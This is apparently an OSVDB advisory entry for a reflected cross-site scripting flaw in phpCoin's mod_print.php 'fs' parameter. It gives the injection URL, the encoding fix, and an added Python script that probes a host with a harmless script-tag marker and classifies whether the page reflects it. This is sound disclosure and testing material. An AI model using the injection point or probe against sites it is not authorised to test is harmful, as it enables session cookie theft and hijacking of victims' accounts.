phpCOIN mod_print.php fs Variable XSS

2006-03-28T06:17:35
ID OSVDB:24188
Type osvdb
Reporter r0t(krustevs@googlemail.com)
Modified 2006-03-28T06:17:35

Description

Vulnerability Description

phpCoin contains a flaw that allows a remote, reflected cross-site scripting attack. The flaw exists because the application does not validate or HTML-encode the 'fs' parameter when it is submitted to the mod_print.php script and echoed back into the generated page. An attacker could craft a URL that, when opened by a victim, executes arbitrary script in the victim's browser in the context of the phpCoin site (the trust relationship between the browser and the server), leading to a loss of integrity, such as theft of the session cookie or actions performed with the victim's session.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. The standard defence for this class of flaw is to HTML-entity-encode the value of 'fs' (in PHP, htmlspecialchars() with ENT_QUOTES) before it is written into the page, rather than relying on input filtering alone.

Short Description

phpCoin mod_print.php does not validate or encode the 'fs' parameter, allowing reflected cross-site scripting via a specially crafted URL.

Manual Testing Notes

/mod_print.php?mod=helpdesk&sb=&so=&fb=&fs=[XSS]
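The probe above only shows where the payload goes; confirming the flaw means checking whether the payload comes back in the response verbatim or HTML-encoded. The following script is an added example, not part of the OSVDB entry or of phpCoin: it builds the probe URL from the manual testing note with a unique marker, classifies a response body as vulnerable (marker reflected unescaped), escaped (reflected only as entities) or absent, and includes a live fetch helper. The base URL http://example.invalid/phpcoin and the two sample response bodies are constructed assumptions, not captured phpCoin output.

```python
"""Reflection check for the phpCoin mod_print.php 'fs' parameter.

Added example; base URL and sample pages below are constructed, not real
phpCoin output. Only run probe() against hosts you are authorised to test.
"""
import html
import secrets
import urllib.parse
import urllib.request

MODULE_PATH = "/mod_print.php"


def make_marker() -> str:
    # Random tag so a reflection cannot be confused with page content.
    return "xss" + secrets.token_hex(4)


def payload_for(marker: str) -> str:
    # Mirrors the advisory's [XSS] placeholder with a harmless script element.
    return f"<script>{marker}</script>"


def build_probe_url(base_url: str, marker: str) -> str:
    # Same parameters as the manual testing note; urlencode percent-encodes
    # the angle brackets so the URL is well formed.
    query = urllib.parse.urlencode(
        {"mod": "helpdesk", "sb": "", "so": "", "fb": "", "fs": payload_for(marker)}
    )
    return base_url.rstrip("/") + MODULE_PATH + "?" + query


def classify_reflection(body: str, marker: str) -> str:
    """'vulnerable' if the payload is echoed raw, 'escaped' if entity-encoded,
    'absent' if the marker is not reflected at all."""
    raw = payload_for(marker)
    if raw in body:
        return "vulnerable"
    if html.escape(raw) in body:
        return "escaped"
    return "absent"


def probe(base_url: str, timeout: float = 10.0) -> str:
    """Fetch the probe URL from a live host and classify the response."""
    marker = make_marker()
    url = build_probe_url(base_url, marker)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return classify_reflection(body, marker)


# Constructed sample responses standing in for an unpatched and a fixed page.
def vulnerable_page(marker: str) -> str:
    return f"<html><body><p>Search: {payload_for(marker)}</p></body></html>"


def hardened_page(marker: str) -> str:
    # What the output looks like once 'fs' is passed through htmlspecialchars().
    encoded = html.escape(payload_for(marker))
    return f"<html><body><p>Search: {encoded}</p></body></html>"


if __name__ == "__main__":
    m = make_marker()
    print(build_probe_url("http://example.invalid/phpcoin", m))
    print("unpatched:", classify_reflection(vulnerable_page(m), m))
    print("hardened: ", classify_reflection(hardened_page(m), m))
```

The classifier deliberately tests for the exact payload rather than for the marker alone, because a page that reflects the marker only inside an entity-encoded string is not exploitable through this vector.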

References:

Vendor URL: http://www.phpcoin.com/
Secunia Advisory ID: 19419
Related OSVDB ID: 24189
Other Advisory URL: http://pridels.blogspot.com/2006/03/phpcoin-v122-xss-vuln.html
FrSIRT Advisory: ADV-2006-1129
CVE: CVE-2006-1428
Bugtraq ID: 17279